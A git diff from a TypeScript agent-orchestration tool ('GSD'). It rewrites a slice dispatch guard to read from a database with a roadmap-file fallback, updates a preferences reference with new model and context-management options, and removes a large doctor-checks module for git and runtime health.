+          collectingOptionalDeps = bracketDepth > 0;
+        }
+      } else {
+        collected.push(line);
+      }
+    }
+  }
+
+  return collected.join("\n");
+}
+
+function countChar(text: string, char: string): number {
+  return [...text].filter((c) => c === char).length;
+}
+
+function normalizePackageName(name: string): string {
+  return name.toLowerCase().replace(/[_.]/g, "-");
+}
+
+function normalizePluginAlias(alias: string): string {
+  return alias.toLowerCase().replace(/[-_]/g, ".");
+}
+
+function versionCatalogAccessorName(relativePath: string): string {
+  const normalized = relativePath.replaceAll("\\", "/");
+  const basename = normalized.slice(normalized.lastIndexOf("/") + 1);
+  return basename.replace(/\.versions\.toml$/i, "").toLowerCase();
+}
+
+function resolveVersionCatalogAccessors(
+  basePath: string,
+  versionCatalogFiles: string[],
+  settingsFiles: string[],
+): Set<string> {
+  const accessors = new Set(versionCatalogFiles.map(versionCatalogAccessorName).filter(Boolean));
+  if (versionCatalogFiles.length === 0 || settingsFiles.length === 0) {
+    return accessors;
+  }
+
+  for (const settingsFile of settingsFiles) {
+    try {
+      const raw = readBounded(join(basePath, settingsFile), 64 * 1024);
+      const content = stripDependencyComments(settingsFile, raw);
+      const createRe = /create\(\s*["']([A-Za-z0-9_]+)["']\s*\)\s*\{[\s\S]*?([A-Za-z0-9_.-]+\.versions\.toml)["']?\s*\)\s*\)/g;
+      let match: RegExpExecArray | null;
+      while ((match = createRe.exec(content)) !== null) {
+        const accessor = match[1].toLowerCase();
+        const catalogBasename = match[2].replaceAll("\\", "/").split("/").pop()!;
+        if (versionCatalogFiles.some((file) => {
+          const normalized = file.replaceAll("\\", "/");
+          return normalized === catalogBasename || normalized.endsWith(`/${catalogBasename}`);
+        })) {
+          accessors.add(accessor);
+        }
+      }
+    } catch {
+      // unreadable settings file — ignore
+    }
+  }
+
+  return accessors;
+}
+
+export function scanProjectFiles(basePath: string): string[] {
+  const files: string[] = [];
+  const queue: Array<{ path: string; depth: number }> = [{ path: basePath, depth: 0 }];
+
+  while (queue.length > 0 && files.length < MAX_RECURSIVE_SCAN_FILES) {
+    const current = queue.shift()!;
+    let entries: Array<{ name: string; isDirectory(): boolean; isFile(): boolean }>;
+    try {
+      entries = readdirSync(current.path, { withFileTypes: true, encoding: "utf8" });
+    } catch {
+      continue;
+    }
+
+    for (const entry of entries) {
+      const entryPath = join(current.path, entry.name);
+      const relativePath = entryPath.slice(basePath.length + 1);
+
+      if (entry.isDirectory()) {
+        if (current.depth < MAX_RECURSIVE_SCAN_DEPTH && !RECURSIVE_SCAN_IGNORED_DIRS.has(entry.name)) {
+          queue.push({ path: entryPath, depth: current.depth + 1 });
+        }
+        continue;
+      }
+
+      if (!entry.isFile()) continue;
+      files.push(relativePath);
+      if (files.length >= MAX_RECURSIVE_SCAN_FILES) break;
+    }
+  }
+
+  return files;
+}
diff --git a/src/resources/extensions/gsd/dispatch-guard.ts b/src/resources/extensions/gsd/dispatch-guard.ts
index e0f065fea..c687f1b30 100644
--- a/src/resources/extensions/gsd/dispatch-guard.ts
+++ b/src/resources/extensions/gsd/dispatch-guard.ts
@@ -1,10 +1,12 @@
 // GSD Dispatch Guard — prevents out-of-order slice dispatch
 
-import { readFileSync } from "node:fs";
-import { readdirSync } from "node:fs";
-import { resolveMilestoneFile, milestonesDir } from "./paths.js";
-import { parseRoadmapSlices } from "./roadmap-slices.js";
+import { resolveMilestoneFile } from "./paths.js";
 import { findMilestoneIds } from "./guided-flow.js";
+import { parseUnitId } from "./unit-id.js";
+import { isDbAvailable, getMilestoneSlices } from "./gsd-db.js";
+import { parseRoadmap } from "./parsers-legacy.js";
+import { isClosedStatus } from "./status-guards.js";
+import { readFileSync } from "node:fs";
 
 const SLICE_DISPATCH_TYPES = new Set([
   "research-slice",
@@ -14,28 +16,6 @@ const SLICE_DISPATCH_TYPES = new Set([
   "complete-slice",
 ]);
 
-/**
- * Read a roadmap file from disk (working tree) rather than from a git branch.
- *
- * Prior implementation used `git show <branch>:<path>` which read committed
- * state on a specific branch. This caused false-positive blockers when work
- * was committed on a milestone/worktree branch but the integration branch
- * (main) hadn't been updated yet — the guard would see prior slices as
- * incomplete on main even though they were done in the working tree (#530).
- *
- * Reading from disk always reflects the latest state, regardless of which
- * branch is checked out or whether changes have been committed.
- */
-function readRoadmapFromDisk(base: string, milestoneId: string): string | null {
-  try {
-    const absPath = resolveMilestoneFile(base, milestoneId, "ROADMAP");
-    if (!absPath) return null;
-    return readFileSync(absPath, "utf-8").trim();
-  } catch {
-    return null;
-  }
-}
-
 export function getPriorSliceCompletionBlocker(
   base: string,
   _mainBranch: string,
@@ -44,12 +24,23 @@ export function getPriorSliceCompletionBlocker(
 ): string | null {
   if (!SLICE_DISPATCH_TYPES.has(unitType)) return null;
 
-  const [targetMid, targetSid] = unitId.split("/");
+  const { milestone: targetMid, slice: targetSid } = parseUnitId(unitId);
   if (!targetMid || !targetSid) return null;
 
+  // Parallel worker isolation: when GSD_MILESTONE_LOCK is set, this worker
+  // is scoped to a single milestone. Skip the cross-milestone dependency
+  // check — other milestones are being handled by their own workers.
+  // Without this, the dispatch guard sees incomplete slices in M010/M011
+  // (cloned into the worktree DB) and blocks M012 from ever starting. #2797
+  const milestoneLock = process.env.GSD_MILESTONE_LOCK;
+
   // Use findMilestoneIds to respect custom queue order.
   // Only check milestones that come BEFORE the target in queue order.
-  const allIds = findMilestoneIds(base);
+  // When locked to a specific milestone, only check that milestone's
+  // intra-slice dependencies — skip all cross-milestone checks.
+  const allIds = milestoneLock && targetMid === milestoneLock
+    ? [targetMid]
+    : findMilestoneIds(base);
   const targetIdx = allIds.indexOf(targetMid);
   if (targetIdx < 0) return null;
   const milestoneIds = allIds.slice(0, targetIdx + 1);
@@ -58,11 +49,35 @@ export function getPriorSliceCompletionBlocker(
     if (resolveMilestoneFile(base, mid, "PARKED")) continue;
     if (resolveMilestoneFile(base, mid, "SUMMARY")) continue;
 
-    // Read from disk (working tree) — always has the latest state
-    const roadmapContent = readRoadmapFromDisk(base, mid);
-    if (!roadmapContent) continue;
+    // Normalised slice list from DB or file fallback
+    type NormSlice = { id: string; done: boolean; depends: string[] };
+    let slices: NormSlice[] | null = null;
+
+    if (isDbAvailable()) {
+      const rows = getMilestoneSlices(mid);
+      if (rows.length > 0) {
+        slices = rows.map((r) => ({
+          id: r.id,
+          done: isClosedStatus(r.status),
+          depends: r.depends ?? [],
+        }));
+      }
+    }
+    if (!slices) {
+      // File-based fallback: parse roadmap checkboxes
+      const roadmapPath = resolveMilestoneFile(base, mid, "ROADMAP");
+      if (!roadmapPath) continue;
+      let roadmapContent: string;
+      try { roadmapContent = readFileSync(roadmapPath, "utf-8"); } catch { continue; }
+      const parsed = parseRoadmap(roadmapContent);
+      if (parsed.slices.length === 0) continue;
+      slices = parsed.slices.map((s) => ({
+        id: s.id,
+        done: s.done,
+        depends: s.depends ?? [],
+      }));
+    }
 
-    const slices = parseRoadmapSlices(roadmapContent);
     if (mid !== targetMid) {
       const incomplete = slices.find((slice) => !slice.done);
       if (incomplete) {
diff --git a/src/resources/extensions/gsd/docs/preferences-reference.md b/src/resources/extensions/gsd/docs/preferences-reference.md
index f3b2ccd0f..cc8c4b3b0 100644
--- a/src/resources/extensions/gsd/docs/preferences-reference.md
+++ b/src/resources/extensions/gsd/docs/preferences-reference.md
@@ -1,6 +1,6 @@
 # GSD Preferences Reference
 
-Full documentation for `~/.gsd/preferences.md` (global) and `.gsd/preferences.md` (project).
+Full documentation for `~/.gsd/PREFERENCES.md` (global) and `.gsd/PREFERENCES.md` (project).
 
 ---
 
@@ -51,8 +51,8 @@ skill_rules: []
 
 Preferences are loaded from two locations and merged:
 
-1. **Global:** `~/.gsd/preferences.md` — applies to all projects
-2. **Project:** `.gsd/preferences.md` — applies to the current project only
+1. **Global:** `~/.gsd/PREFERENCES.md` — applies to all projects
+2. **Project:** `.gsd/PREFERENCES.md` — applies to the current project only
 
 **Merge behavior** (see `mergePreferences()` in `preferences.ts`):
 
@@ -102,12 +102,14 @@ Setting `prefer_skills: []` does **not** disable skill discovery — it just mea
 
 - `custom_instructions`: extra durable instructions related to skill use. For operational project knowledge (recurring rules, gotchas, patterns), use `.gsd/KNOWLEDGE.md` instead — it's injected into every agent prompt automatically and agents can append to it during execution.
 
-- `models`: per-stage model selection for auto-mode. Keys: `research`, `planning`, `execution`, `execution_simple`, `completion`, `subagent`. Values can be:
+- `models`: per-stage model selection (applies to both auto-mode and guided-flow dispatches). Keys: `research`, `planning`, `discuss`, `execution`, `execution_simple`, `completion`, `validation`, `subagent`. Values can be:
   - Simple string: `"claude-sonnet-4-6"` — single model, no fallbacks
   - Provider-qualified string: `"bedrock/claude-sonnet-4-6"` — targets a specific provider when the same model ID exists across multiple providers
   - Object with fallbacks: `{ model: "claude-opus-4-6", fallbacks: ["glm-5", "minimax-m2.5"] }` — tries fallbacks in order if primary fails
   - Object with provider: `{ model: "claude-opus-4-6", provider: "bedrock" }` — explicit provider targeting in object format
-  - Omit a key to use whatever model is currently active. Fallbacks are tried when model switching fails (provider unavailable, rate limited, etc.).
+  - Omit a key to use whatever model is currently active (except `discuss` and `validation` which fall back to `planning` when unset). Fallbacks are tried when model switching fails (provider unavailable, rate limited, etc.).
+  - `discuss` — used for milestone/slice discussion (interactive context gathering). Falls back to `planning` if unset.
+  - `validation` — used for gate evaluation, roadmap reassessment, milestone validation, and doc rewrites. Falls back to `planning` if unset.
 
 - `skill_staleness_days`: number — skills unused for this many days get deprioritized during discovery. Set to `0` to disable staleness tracking. Default: `60`.
 
@@ -126,8 +128,8 @@ Setting `prefer_skills: []` does **not** disable skill discovery — it just mea
   - `auto_push`: boolean — automatically push commits to the remote after committing. Default: `false`.
   - `push_branches`: boolean — push the milestone branch to the remote after commits. Default: `false`.
   - `remote`: string — git remote name to push to. Default: `"origin"`.
-  - `snapshots`: boolean — create snapshot commits (WIP saves) during long-running tasks. Default: `false`.
-  - `pre_merge_check`: boolean or `"auto"` — run pre-merge checks before merging a worktree back to the integration branch. `true` always runs, `false` never runs, `"auto"` runs when CI is detected. Default: `false`.
+  - `snapshots`: boolean — create snapshot commits (WIP saves) during long-running tasks. Default: `true`.
+  - `pre_merge_check`: boolean or `"auto"` — run pre-merge checks before merging a worktree back to the integration branch. `true` always runs, `false` never runs, `"auto"` runs when CI is detected. Default: `"auto"`.
   - `commit_type`: string — override the conventional commit type prefix. Must be one of: `feat`, `fix`, `refactor`, `docs`, `test`, `chore`, `perf`, `ci`, `build`, `style`. Default: inferred from diff content.
   - `main_branch`: string — the primary branch name for new git repos (e.g., `"main"`, `"master"`, `"trunk"`). Also used by `getMainBranch()` as the preferred branch when auto-detection is ambiguous. Default: `"main"`.
   - `merge_strategy`: `"squash"` or `"merge"` — controls how worktree branches are merged back. `"squash"` combines all commits into one; `"merge"` preserves individual commits. Default: `"squash"`.
@@ -187,6 +189,13 @@ Setting `prefer_skills: []` does **not** disable skill discovery — it just mea
   - `budget_pressure`: boolean — downgrade model tier when budget is under pressure. Default: `true`.
   - `cross_provider`: boolean — allow routing across different providers. Default: `true`.
   - `hooks`: boolean — enable routing hooks. Default: `true`.
+  - `capability_routing`: boolean — enable capability-profile scoring for model selection within a tier. Requires `enabled: true`. Default: `false`.
+
+- `context_management`: configures context hygiene for auto-mode sessions. Keys:
+  - `observation_masking`: boolean — mask old tool results to reduce context bloat. Default: `true`.
+  - `observation_mask_turns`: number — keep this many recent turns verbatim (1-50). Default: `8`.
+  - `compaction_threshold_percent`: number — trigger compaction at this % of context window (0.5-0.95). Lower values fire compaction earlier, reducing drift. Default: `0.70`.
+  - `tool_result_max_chars`: number — max chars per tool result in GSD sessions (200-10000). Default: `800`.
 
 - `auto_visualize`: boolean — show a visualizer hint after each milestone completion in auto-mode. Default: `false`.
 
@@ -202,6 +211,7 @@ Setting `prefer_skills: []` does **not** disable skill discovery — it just mea
   - `budget_ceiling`: number — optional per-parallel-run budget ceiling.
   - `merge_strategy`: `"per-slice"` or `"per-milestone"` — when to merge worktree results back. Default: `"per-milestone"`.
   - `auto_merge`: `"auto"`, `"confirm"`, or `"manual"` — merge behavior after completion. `"auto"` merges immediately; `"confirm"` asks first; `"manual"` leaves branches for you. Default: `"confirm"`.
+  - `worker_model`: string — optional model override for parallel milestone workers. When set, workers use this model (e.g. `"claude-haiku-4-5"`) instead of inheriting the coordinator's model. Useful for cost savings on execution-heavy milestones.
 
 - `verification_commands`: string[] — shell commands to run as verification after task execution (e.g., `["npm test", "npm run lint"]`). Commands run in order; if any fails, the task is marked as needing fixes.
 
@@ -241,6 +251,9 @@ Setting `prefer_skills: []` does **not** disable skill discovery — it just mea
 
   **Known unit types for `before`/`after`:** `research-milestone`, `plan-milestone`, `research-slice`, `plan-slice`, `execute-task`, `complete-slice`, `replan-slice`, `reassess-roadmap`, `run-uat`.
 
+- `experimental`: opt-in experimental features. All features here are **off by default** — you must explicitly set each one to `true` to enable it. Features in this block may change or be removed without a deprecation cycle while in experimental status. Keys:
+  - `rtk`: boolean — enable RTK (Real-Time Kompression) shell-command compression. When enabled, GSD wraps shell commands through the RTK binary to reduce token usage during command execution. RTK is downloaded automatically on first use if not already installed. **Default: `false`** (opt-in required). Set `GSD_RTK_DISABLED=1` in the environment to force-disable regardless of this preference.
+
 ---
 
 ## Best Practices
@@ -652,3 +665,15 @@ verification_max_retries: 2
 ```
 
 Runs test, lint, and typecheck after each task. On failure, auto-fix is attempted up to 2 times before reporting the issue.
+
+## Experimental Features Example
+
+```yaml
+---
+version: 1
+experimental:
+  rtk: true
+---
+```
+
+Opts in to RTK shell-command compression. RTK is downloaded automatically on first use. Set `GSD_RTK_DISABLED=1` to force-disable at the environment level regardless of this setting.
diff --git a/src/resources/extensions/gsd/doctor-checks.ts b/src/resources/extensions/gsd/doctor-checks.ts
index 64eb0a921..d9a26e66c 100644
--- a/src/resources/extensions/gsd/doctor-checks.ts
+++ b/src/resources/extensions/gsd/doctor-checks.ts
@@ -1,1068 +1,5 @@
-import { existsSync, lstatSync, readdirSync, readFileSync, realpathSync, rmSync, statSync } from "node:fs";
-import { basename, dirname, join, sep } from "node:path";
-
-import type { DoctorIssue, DoctorIssueCode } from "./doctor-types.js";
-import { readRepoMeta, externalProjectsRoot } from "./repo-identity.js";
-import { loadFile, parseRoadmap } from "./files.js";
-import { resolveMilestoneFile, milestonesDir, gsdRoot, resolveGsdRootFile, relGsdRootFile } from "./paths.js";
-import { deriveState, isMilestoneComplete } from "./state.js";
-import { saveFile } from "./files.js";
-import { listWorktrees, resolveGitDir, worktreesDir } from "./worktree-manager.js";
-import { abortAndReset } from "./git-self-heal.js";
-import { RUNTIME_EXCLUSION_PATHS, resolveMilestoneIntegrationBranch, writeIntegrationBranch } from "./git-service.js";
-import { nativeIsRepo, nativeBranchExists, nativeWorktreeList, nativeWorktreeRemove, nativeBranchList, nativeBranchDelete, nativeLsFiles, nativeRmCached, nativeForEachRef, nativeUpdateRef } from "./native-git-bridge.js";
-import { readCrashLock, isLockProcessAlive, clearLock } from "./crash-recovery.js";
-import { ensureGitignore } from "./gitignore.js";
-import { getAllWorktreeHealth } from "./worktree-health.js";
-import { readAllSessionStatuses, isSessionStale, removeSessionStatus } from "./session-status-io.js";
-import { recoverFailedMigration } from "./migrate-external.js";
-import { loadEffectiveGSDPreferences } from "./preferences.js";
-
-export async function checkGitHealth(
-  basePath: string,
-  issues: DoctorIssue[],
-  fixesApplied: string[],
-  shouldFix: (code: DoctorIssueCode) => boolean,
-  isolationMode: "none" | "worktree" | "branch" = "worktree",
-): Promise<void> {
-  // Degrade gracefully if not a git repo
-  if (!nativeIsRepo(basePath)) {
-    return; // Not a git repo — skip all git health checks
-  }
-
-  const gitDir = resolveGitDir(basePath);
-
-  // ── Orphaned auto-worktrees & Stale milestone branches ────────────────
-  // These checks only apply in worktree/branch modes — skip in none mode
-  // where no milestone worktrees or branches are created.
-  if (isolationMode !== "none") {
-  try {
-    const worktrees = listWorktrees(basePath);
-    const milestoneWorktrees = worktrees.filter(wt => wt.branch.startsWith("milestone/"));
-
-    // Load roadmap state once for cross-referencing
-    const state = await deriveState(basePath);
-
-    for (const wt of milestoneWorktrees) {
-      // Extract milestone ID from branch name "milestone/M001" → "M001"
-      const milestoneId = wt.branch.replace(/^milestone\//, "");
-      const milestoneEntry = state.registry.find(m => m.id === milestoneId);
-
-      // Check if milestone is complete via roadmap
-      let isComplete = false;
-      if (milestoneEntry) {
-        const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP");
-        const roadmapContent = roadmapPath ? await loadFile(roadmapPath) : null;
-        if (roadmapContent) {
-          const roadmap = parseRoadmap(roadmapContent);
-          isComplete = isMilestoneComplete(roadmap);
-        }
-      }
-
-      if (isComplete) {
-        issues.push({
-          severity: "warning",
-          code: "orphaned_auto_worktree",
-          scope: "milestone",
-          unitId: milestoneId,
-          message: `Worktree for completed milestone ${milestoneId} still exists at ${wt.path}`,
-          fixable: true,
-        });
-
-        if (shouldFix("orphaned_auto_worktree")) {
-          // Never remove a worktree matching current working directory
-          const cwd = process.cwd();
-          if (wt.path === cwd || cwd.startsWith(wt.path + sep)) {
-            fixesApplied.push(`skipped removing worktree at ${wt.path} (is cwd)`);
-          } else {
-            try {
-              nativeWorktreeRemove(basePath, wt.path, true);
-              fixesApplied.push(`removed orphaned worktree ${wt.path}`);
-            } catch {
-              fixesApplied.push(`failed to remove worktree ${wt.path}`);
-            }
-          }
-        }
-      }
-    }
-
-    // ── Stale milestone branches ─────────────────────────────────────────
-    try {
-      const branches = nativeBranchList(basePath, "milestone/*");
-      if (branches.length > 0) {
-        const worktreeBranches = new Set(milestoneWorktrees.map(wt => wt.branch));
-
-        for (const branch of branches) {
-          // Skip branches that have a worktree (handled above)
-          if (worktreeBranches.has(branch)) continue;
-
-          const milestoneId = branch.replace(/^milestone\//, "");
-          const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP");
-          const roadmapContent = roadmapPath ? await loadFile(roadmapPath) : null;
-          if (!roadmapContent) continue;
-
-          const roadmap = parseRoadmap(roadmapContent);
-          if (isMilestoneComplete(roadmap)) {
-            issues.push({
-              severity: "info",
-              code: "stale_milestone_branch",
-              scope: "milestone",
-              unitId: milestoneId,
-              message: `Branch ${branch} exists for completed milestone ${milestoneId}`,
-              fixable: true,
-            });
-
-            if (shouldFix("stale_milestone_branch")) {
-              try {
-                nativeBranchDelete(basePath, branch, true);
-                fixesApplied.push(`deleted stale branch ${branch}`);
-              } catch {
-                fixesApplied.push(`failed to delete branch ${branch}`);
-              }
-            }
-          }
-        }
-      }
-    } catch {
-      // git branch list failed — skip stale branch check
-    }
-  } catch {
-    // listWorktrees or deriveState failed — skip worktree/branch checks
-  }
-  } // end isolationMode !== "none"
-
-  // ── Corrupt merge state ────────────────────────────────────────────────
-  try {
-    const mergeStateFiles = ["MERGE_HEAD", "SQUASH_MSG"];
-    const mergeStateDirs = ["rebase-apply", "rebase-merge"];
-    const found: string[] = [];
-
-    for (const f of mergeStateFiles) {
-      if (existsSync(join(gitDir, f))) found.push(f);
-    }
-    for (const d of mergeStateDirs) {
-      if (existsSync(join(gitDir, d))) found.push(d);
-    }
-
-    if (found.length > 0) {
-      issues.push({
-        severity: "error",
-        code: "corrupt_merge_state",
-        scope: "project",
-        unitId: "project",
-        message: `Corrupt merge/rebase state detected: ${found.join(", ")}`,
-        fixable: true,
-      });
-
-      if (shouldFix("corrupt_merge_state")) {
-        const result = abortAndReset(basePath);
-        fixesApplied.push(`cleaned merge state: ${result.cleaned.join(", ")}`);
-      }
-    }
-  } catch {
-    // Can't check .git dir — skip
-  }
-
-  // ── Tracked runtime files ──────────────────────────────────────────────
-  try {
-    const trackedPaths: string[] = [];
-    for (const exclusion of RUNTIME_EXCLUSION_PATHS) {
-      try {
-        const files = nativeLsFiles(basePath, exclusion);
-        if (files.length > 0) {
-          trackedPaths.push(...files);
-        }
-      } catch {
-        // Individual ls-files can fail — continue
-      }
-    }
-
-    if (trackedPaths.length > 0) {
-      issues.push({
-        severity: "warning",
-        code: "tracked_runtime_files",
-        scope: "project",
-        unitId: "project",
-        message: `${trackedPaths.length} runtime file(s) are tracked by git: ${trackedPaths.slice(0, 5).join(", ")}${trackedPaths.length > 5 ? "..." : ""}`,
-        fixable: true,
-      });
-
-      if (shouldFix("tracked_runtime_files")) {
-        try {
-          for (const exclusion of RUNTIME_EXCLUSION_PATHS) {
-            nativeRmCached(basePath, [exclusion]);
-          }
-          fixesApplied.push(`untracked ${trackedPaths.length} runtime file(s)`);
-        } catch {
-          fixesApplied.push("failed to untrack runtime files");
-        }
-      }
-    }
-  } catch {
-    // git ls-files failed — skip
-  }
-
-  // ── Legacy slice branches ──────────────────────────────────────────────
-  try {
-    const branchList = nativeBranchList(basePath, "gsd/*/*")
-      .filter((branch) => !branch.startsWith("gsd/quick/"));
-    if (branchList.length > 0) {
-      issues.push({
-        severity: "info",
-        code: "legacy_slice_branches",
-        scope: "project",
-        unitId: "project",
-        message: `${branchList.length} legacy slice branch(es) found: ${branchList.slice(0, 3).join(", ")}${branchList.length > 3 ? "..." : ""}. These are no longer used (branchless architecture).`,
-        fixable: true,
-      });
-
-      if (shouldFix("legacy_slice_branches")) {
-        let deleted = 0;
-        for (const branch of branchList) {
-          try {
-            nativeBranchDelete(basePath, branch, true);
-            deleted++;
-          } catch { /* skip branches that can't be deleted */ }
-        }
-        if (deleted > 0) {
-          fixesApplied.push(`deleted ${deleted} legacy slice branch(es)`);
-        }
-      }
-    }
-  } catch {
-    // git branch list failed — skip
-  }
-
-  // ── Integration branch existence ──────────────────────────────────────
-  // For each active (non-complete) milestone, verify the stored integration
-  // branch still exists in git. A missing integration branch blocks merge-back
-  // and causes the next merge operation to fail silently.
-  try {
-    const state = await deriveState(basePath);
-    const gitPrefs = loadEffectiveGSDPreferences()?.preferences?.git ?? {};
-    for (const milestone of state.registry) {
-      if (milestone.status === "complete") continue;
-      const resolution = resolveMilestoneIntegrationBranch(basePath, milestone.id, gitPrefs);
-      if (!resolution.recordedBranch) continue; // No stored branch — skip (not yet set)
-      if (resolution.status === "fallback" && resolution.effectiveBranch) {
-        issues.push({
-          severity: "warning",
-          code: "integration_branch_missing",
-          scope: "milestone",
-          unitId: milestone.id,
-          message: resolution.reason,
-          fixable: true,
-        });
-        if (shouldFix("integration_branch_missing")) {
-          writeIntegrationBranch(basePath, milestone.id, resolution.effectiveBranch);
-          fixesApplied.push(`updated integration branch for ${milestone.id} to "${resolution.effectiveBranch}"`);
-        }
-        continue;
-      }
-
-      if (resolution.status === "missing") {
-        issues.push({
-          severity: "error",
-          code: "integration_branch_missing",
-          scope: "milestone",
-          unitId: milestone.id,
-          message: resolution.reason,
-          fixable: false,
-        });
-      }
-    }
-  } catch {
-    // Non-fatal — integration branch check failed
-  }
-
-  // ── Orphaned worktree directories ────────────────────────────────────
-  // Worktree removal can fail after a branch delete, leaving a directory
-  // that is no longer registered with git. These orphaned dirs cause
-  // "already exists" errors when re-creating the same worktree name.
-  try {
-    const wtDir = worktreesDir(basePath);
-    if (existsSync(wtDir)) {
-      // Resolve symlinks and normalize separators so that symlinked .gsd
-      // paths (e.g. ~/.gsd/projects/<hash>/worktrees/…) match the paths
-      // returned by `git worktree list`.
-      const normalizePath = (p: string): string => {
-        try { p = realpathSync(p); } catch { /* path may not exist */ }
-        return p.replaceAll("\\", "/");
-      };
-      const registeredPaths = new Set(
-        nativeWorktreeList(basePath).map(entry => normalizePath(entry.path)),
-      );
-      for (const entry of readdirSync(wtDir)) {
-        const fullPath = join(wtDir, entry);
-        try {
-          if (!statSync(fullPath).isDirectory()) continue;
-        } catch { continue; }
-        const normalizedFullPath = normalizePath(fullPath);
-        if (!registeredPaths.has(normalizedFullPath)) {
-          issues.push({
-            severity: "warning",
-            code: "worktree_directory_orphaned",
-            scope: "project",
-            unitId: entry,
-            message: `Worktree directory ${fullPath} exists on disk but is not registered with git. Run "git worktree prune" or doctor --fix to remove it.`,
-            fixable: true,
-          });
-          if (shouldFix("worktree_directory_orphaned")) {
-            try {
-              rmSync(fullPath, { recursive: true, force: true });
-              fixesApplied.push(`removed orphaned worktree directory ${fullPath}`);
-            } catch {
-              fixesApplied.push(`failed to remove orphaned worktree directory ${fullPath}`);
-            }
-          }
-        }
-      }
-    }
-  } catch {
-    // Non-fatal — orphaned worktree directory check failed
-  }
-
-  // ── Worktree lifecycle checks ──────────────────────────────────────────
-  // Check GSD-managed worktrees for: merged branches, stale work, dirty
-  // state, and unpushed commits. Only worktrees under .gsd/worktrees/.
-  try {
-    const healthStatuses = getAllWorktreeHealth(basePath);
-    const cwd = process.cwd();
-
-    for (const health of healthStatuses) {
-      const wt = health.worktree;
-      const isCwd = wt.path === cwd || cwd.startsWith(wt.path + sep);
-
-      // Branch fully merged into main — safe to remove
-      if (health.mergedIntoMain) {
-        issues.push({
-          severity: "info",
-          code: "worktree_branch_merged",
-          scope: "project",
-          unitId: wt.name,
-          message: `Worktree "${wt.name}" (branch ${wt.branch}) is fully merged into main${health.safeToRemove ? " — safe to remove" : ""}`,
-          fixable: health.safeToRemove,
-        });
-
-        if (health.safeToRemove && shouldFix("worktree_branch_merged") && !isCwd) {
-          try {
-            const { removeWorktree } = await import("./worktree-manager.js");
-            removeWorktree(basePath, wt.name, { deleteBranch: true, branch: wt.branch });
-            fixesApplied.push(`removed merged worktree "${wt.name}" and deleted branch ${wt.branch}`);
-          } catch {
-            fixesApplied.push(`failed to remove merged worktree "${wt.name}"`);
-          }
-        }
-        // If merged, skip the stale/dirty/unpushed checks — they're irrelevant
-        continue;
-      }
-
-      // Stale: no commits in N days, not merged
-      if (health.stale) {
-        const days = Math.floor(health.lastCommitAgeDays);
-        issues.push({
-          severity: "warning",
-          code: "worktree_stale",
-          scope: "project",
-          unitId: wt.name,
-          message: `Worktree "${wt.name}" has had no commits in ${days} day${days === 1 ? "" : "s"}`,
-          fixable: false,
-        });
-      }
-
-      // Dirty: uncommitted changes in a worktree (only flag on stale worktrees to avoid noise)
-      if (health.dirty && health.stale) {
-        issues.push({
-          severity: "warning",
-          code: "worktree_dirty",
-          scope: "project",
-          unitId: wt.name,
-          message: `Worktree "${wt.name}" has ${health.dirtyFileCount} uncommitted file${health.dirtyFileCount === 1 ? "" : "s"} and is stale`,
-          fixable: false,
-        });
-      }
-
-      // Unpushed: commits not on any remote (only flag on stale worktrees to avoid noise)
-      if (health.unpushedCommits > 0 && health.stale) {
-        issues.push({
-          severity: "warning",
-          code: "worktree_unpushed",
-          scope: "project",
-          unitId: wt.name,
-          message: `Worktree "${wt.name}" has ${health.unpushedCommits} unpushed commit${health.unpushedCommits === 1 ? "" : "s"}`,
-          fixable: false,
-        });
-      }
-    }
-  } catch {
-    // Non-fatal — worktree lifecycle check failed
-  }
-}
-
-// ── Runtime Health Checks ──────────────────────────────────────────────────
-// Checks for stale crash locks, orphaned completed-units, stale hook state,
-// activity log bloat, STATE.md drift, and gitignore drift.
-
-export async function checkRuntimeHealth(
-  basePath: string,
-  issues: DoctorIssue[],
-  fixesApplied: string[],
-  shouldFix: (code: DoctorIssueCode) => boolean,
-): Promise<void> {
-  const root = gsdRoot(basePath);
-
-  // ── Stale crash lock ──────────────────────────────────────────────────
-  try {
-    const lock = readCrashLock(basePath);
-    if (lock) {
-      const alive = isLockProcessAlive(lock);
-      if (!alive) {
-        issues.push({
-          severity: "error",
-          code: "stale_crash_lock",
-          scope: "project",
-          unitId: "project",
-          message: `Stale auto.lock from PID ${lock.pid} (started ${lock.startedAt}, was executing ${lock.unitType} ${lock.unitId}) — process is no longer running`,
-          file: ".gsd/auto.lock",
-          fixable: true,
-        });
-
-        if (shouldFix("stale_crash_lock")) {
-          clearLock(basePath);
-          fixesApplied.push("cleared stale auto.lock");
-        }
-      }
-    }
-  } catch {
-    // Non-fatal — crash lock check failed
-  }
-
-  // ── Stranded lock directory ────────────────────────────────────────────
-  // proper-lockfile creates a `.gsd.lock/` directory as the OS-level lock
-  // mechanism. If the process was SIGKILLed or crashed hard, this directory
-  // can remain on disk without any live process holding it. The next session
-  // fails to acquire the lock until the directory is removed (#1245).
-  try {
-    const lockDir = join(dirname(root), `${basename(root)}.lock`);
-    if (existsSync(lockDir)) {
-      const statRes = statSync(lockDir);
-      if (statRes.isDirectory()) {
-        // Check if any live process actually holds this lock
-        const lock = readCrashLock(basePath);
-        const lockHolderAlive = lock ? isLockProcessAlive(lock) : false;
-        if (!lockHolderAlive) {
-          issues.push({
-            severity: "error",
-            code: "stranded_lock_directory",
-            scope: "project",
-            unitId: "project",
-            message: `Stranded lock directory "${lockDir}" exists but no live process holds the session lock. This blocks new auto-mode sessions from starting.`,
-            file: lockDir,
-            fixable: true,
-          });
-          if (shouldFix("stranded_lock_directory")) {
-            try {
-              rmSync(lockDir, { recursive: true, force: true });
-              fixesApplied.push(`removed stranded lock directory ${lockDir}`);
-            } catch {
-              fixesApplied.push(`failed to remove stranded lock directory ${lockDir}`);
-            }
-          }
-        }
-      }
-    }
-  } catch {
-    // Non-fatal — stranded lock directory check failed
-  }
-
-  // ── Stale parallel sessions ────────────────────────────────────────────
-  try {
-    const parallelStatuses = readAllSessionStatuses(basePath);
-    for (const status of parallelStatuses) {
-      if (isSessionStale(status)) {
-        issues.push({
-          severity: "warning",
-          code: "stale_parallel_session",
-          scope: "project",
-          unitId: status.milestoneId,
-          message: `Stale parallel session for ${status.milestoneId} (PID ${status.pid}, started ${new Date(status.startedAt).toISOString()}, last heartbeat ${new Date(status.lastHeartbeat).toISOString()}) — process is no longer running`,
-          file: `.gsd/parallel/${status.milestoneId}.status.json`,
-          fixable: true,
-        });
-
-        if (shouldFix("stale_parallel_session")) {
-          removeSessionStatus(basePath, status.milestoneId);
